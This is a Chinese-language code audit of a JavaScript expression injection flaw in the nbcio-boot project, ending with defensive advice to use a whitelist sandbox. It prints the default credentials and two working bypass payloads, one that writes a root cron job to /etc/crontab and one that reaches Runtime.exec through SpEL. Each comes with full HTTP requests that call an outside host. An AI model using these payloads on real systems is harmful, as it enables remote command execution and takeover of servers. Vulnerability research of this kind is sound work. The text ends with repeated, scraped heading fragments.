nbcio-boot代码审计之JS注入攻守道 - 漏洞分析与防御策略<\/h1>

一、项目基本信息<\/h2>

项目地址<\/strong>: https:\/\/gitee.com\/nbacheng\/nbcio-boot.git<\/li>

默认凭证<\/strong>: admin\/123456<\/li> <\/ul>
二、漏洞概述<\/h2>
该系统存在JavaScript表达式注入漏洞，攻击者可通过构造特殊POC绕过现有防御机制，实现任意代码执行。<\/p>
三、漏洞分析<\/h2>
1. 初始漏洞<\/h3>
初始版本存在直接通过JavaScript调用Java类执行系统命令的能力。<\/p>
2. 初始修复措施<\/h3>
系统进行了第一次修复，主要措施包括：<\/p>

对java.lang.Runtime<\/code>等关键类实施黑名单过滤<\/li>
在返回的engine容器中排除这些危险类<\/li> <\/ul> 修复代码位置: https:\/\/gitee.com\/nbacheng\/nbcio-boot\/blob\/master\/nbcio-module-estar\/src\/main\/java\/com\/nbcio\/modules\/estar\/bs\/service\/impl\/DataSetParamServiceImpl.java<\/p> 3. 漏洞绕过技术<\/h3> 方法一：文件写入触发命令执行<\/h4> POC<\/strong>:<\/p> var<\/span> File<\/span>=<\/span>Java<\/span>.type<\/span>("java.io.File"<\/span>); <\/span><\/span>var<\/span> file<\/span>=<\/span>new<\/span> File<\/span>("\/etc\/crontab"<\/span>); <\/span><\/span>var<\/span> FileWriter<\/span>=<\/span>Java<\/span>.type<\/span>("java.io.FileWriter"<\/span>); <\/span><\/span>var<\/span> fw<\/span>=<\/span>new<\/span> FileWriter<\/span>(file<\/span>); <\/span><\/span>var<\/span> BufferedWriter<\/span>=<\/span>Java<\/span>.type<\/span>("java.io.BufferedWriter"<\/span>); <\/span><\/span>var<\/span> bw<\/span>=<\/span>new<\/span> BufferedWriter<\/span>(fw<\/span>); <\/span><\/span>var<\/span> str<\/span>=<\/span>"* * * * * root ping p5.*****.top"<\/span>; <\/span><\/span>bw<\/span>.write<\/span>(str<\/span>);bw<\/span>.flush<\/span>();bw<\/span>.close<\/span>(); <\/span><\/span><\/code><\/pre>攻击原理<\/strong>:<\/p> 通过JavaScript调用Java文件操作类<\/li> 向\/etc\/crontab<\/code>写入定时任务<\/li> 定时任务执行攻击者指定的命令<\/li> <\/ol> 请求示例<\/strong>:<\/p> POST<\/span> \/nbcio-boot\/bs\/bsDataSet\/testTransform HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> 192.168.64.131:8081<\/span> <\/span><\/span>Content-Type:<\/span> application\/json;charset=UTF-8<\/span> <\/span><\/span>X-Access-Token:<\/span> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE3MjMxMzU3MDAsInVzZXJuYW1lIjoiYWRtaW4ifQ.t5je51OW1Q40U-8d0HudQCXQc-WXQbP7o9cmvKjsO3Y<\/span> <\/span><\/span> <\/span><\/span>{"sourceCode"<\/span>:"mysql"<\/span>,"dynSentence"<\/span>:"select * from bs_report_barstack"<\/span>,"dataSetParamDtoList"<\/span>:[{"paramName"<\/span>:""<\/span>,"paramDesc"<\/span>:""<\/span>,"paramType"<\/span>:""<\/span>,"sampleItem"<\/span>:""<\/span>,"mandatory"<\/span>:true<\/span>,"requiredFlag"<\/span>:1<\/span>,"validationRules"<\/span>:"var File=Java.type(\"java.io.File\");var file=new File(\"\/etc\/crontab\");var FileWriter=Java.type(\"java.io.FileWriter\");var fw=new FileWriter(file);var BufferedWriter=Java.type(\"java.io.BufferedWriter\");var bw=new BufferedWriter(fw);var str=\"* * * * * root ping p1.*****.top\\n\";bw.write(str);bw.flush();bw.close();"<\/span>}],"dataSetTransformDtoList"<\/span>:[{"transformType"<\/span>:"js"<\/span>,"transformScript"<\/span>:""<\/span>}],"setType"<\/span>:"sql"<\/span>} <\/span><\/span><\/code><\/pre>方法二：通过SPEL表达式间接执行命令<\/h4> POC<\/strong>:<\/p> var<\/span> A<\/span>=<\/span>Java<\/span>.type<\/span>("org.springframework.expression.spel.standard.SpelExpressionParser"<\/span>); <\/span><\/span>var<\/span> B<\/span>=<\/span>new<\/span> A<\/span>; <\/span><\/span>var<\/span> C<\/span>=<\/span>B<\/span>.parseExpression<\/span>("T(java.lang.Runtime).getRuntime().exec('*****')"<\/span>); <\/span><\/span>var<\/span> D<\/span>=<\/span>C<\/span>.getValue<\/span>(); <\/span><\/span><\/code><\/pre>攻击原理<\/strong>:<\/p> 调用Spring框架的SpelExpressionParser<\/li> 通过SPEL表达式间接调用Runtime执行命令<\/li> 绕过对JavaScript引擎的直接限制<\/li> <\/ol> 请求示例<\/strong>:<\/p> POST<\/span> \/nbcio-boot\/bs\/bsDataSet\/testTransform HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> 192.168.64.131:8081<\/span> <\/span><\/span>Content-Type:<\/span> application\/json;charset=UTF-8<\/span> <\/span><\/span>X-Access-Token:<\/span> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE3MjMxMzU3MDAsInVzZXJuYW1lIjoiYWRtaW4ifQ.t5je51OW1Q40U-8d0HudQCXQc-WXQbP7o9cmvKjsO3Y<\/span> <\/span><\/span> <\/span><\/span>{"sourceCode"<\/span>:"mysql"<\/span>,"dynSentence"<\/span>:"select * from bs_report_barstack"<\/span>,"dataSetParamDtoList"<\/span>:[{"paramName"<\/span>:""<\/span>,"paramDesc"<\/span>:""<\/span>,"paramType"<\/span>:""<\/span>,"sampleItem"<\/span>:""<\/span>,"mandatory"<\/span>:true<\/span>,"requiredFlag"<\/span>:1<\/span>,"validationRules"<\/span>:"var A=Java.type(\"org.springframework.expression.spel.standard.SpelExpressionParser\");var B=new A;var C=B.parseExpression(\"T(java.lang.Runtime).getRuntime().exec('ping p5.*****.top')\");var D=C.getValue();"<\/span>}],"dataSetTransformDtoList"<\/span>:[{"transformType"<\/span>:"js"<\/span>,"transformScript"<\/span>:""<\/span>}],"setType"<\/span>:"sql"<\/span>} <\/span><\/span><\/code><\/pre>四、防御策略<\/h2> 1. 现有防御的问题<\/h3> 采用黑名单机制，防御面有限<\/li> 无法防范未知的攻击向量<\/li> 容易被间接调用方式绕过<\/li> <\/ul> 2. 推荐防御方案<\/h3> 使用NashornSandbox<\/strong>沙箱实现白名单防御：<\/p> 配置白名单<\/strong>：只允许特定的Java类和操作<\/li> 限制资源访问<\/strong>：控制文件系统、网络等敏感操作<\/li> 防止死循环<\/strong>：设置执行超时限制<\/li> <\/ol> 参考资源<\/strong>:<\/p> https:\/\/blog.csdn.net\/gitblog_00274\/article\/details\/142838510<\/li> https:\/\/gitcode.com\/gh_mirrors\/de\/delight-nashorn-sandbox\/<\/li> <\/ul> 3. 实施效果<\/h3> 调用非白名单类时会报错<\/li> 常规JavaScript语句可正常执行<\/li> 有效阻断命令执行等危险操作<\/li> <\/ul> 五、总结<\/h2> 黑名单防御机制存在固有缺陷，应采用白名单策略<\/li> JavaScript引擎与Java交互存在多种潜在攻击面<\/li> 沙箱环境是解决此类问题的有效方案<\/li> 防御措施需考虑多种攻击场景，包括但不限于：直接命令执行<\/li> 间接文件操作<\/li> 框架特性滥用<\/li> 资源耗尽攻击<\/li> <\/ul> <\/li> <\/ol> 六、扩展思考<\/h2> 其他可能的攻击向量：<\/p> 通过反射机制绕过限制<\/li> 利用其他Java内置类实现攻击<\/li> 组合多种技术实现更隐蔽的攻击<\/li> <\/ul> <\/li> 防御措施的完善方向：<\/p> 结合静态分析和动态沙箱<\/li> 实施细粒度的权限控制<\/li> 增加行为监控和审计日志<\/li> <\/ul> <\/li> <\/ol>

nbcio-boot代码审计之JS注入攻守道 - 漏洞分析与防御策略<\/h1>

二、漏洞概述<\/h2> 该系统存在JavaScript表达式注入漏洞，攻击者可通过构造特殊POC绕过现有防御机制，实现任意代码执行。<\/p>

三、漏洞分析<\/h2>

1. 初始漏洞<\/h3> 初始版本存在直接通过JavaScript调用Java类执行系统命令的能力。<\/p>

3. 漏洞绕过技术<\/h3>

四、防御策略<\/h2>

二、漏洞概述<\/h2>
该系统存在JavaScript表达式注入漏洞，攻击者可通过构造特殊POC绕过现有防御机制，实现任意代码执行。<\/p>

1. 初始漏洞<\/h3>
初始版本存在直接通过JavaScript调用Java类执行系统命令的能力。<\/p>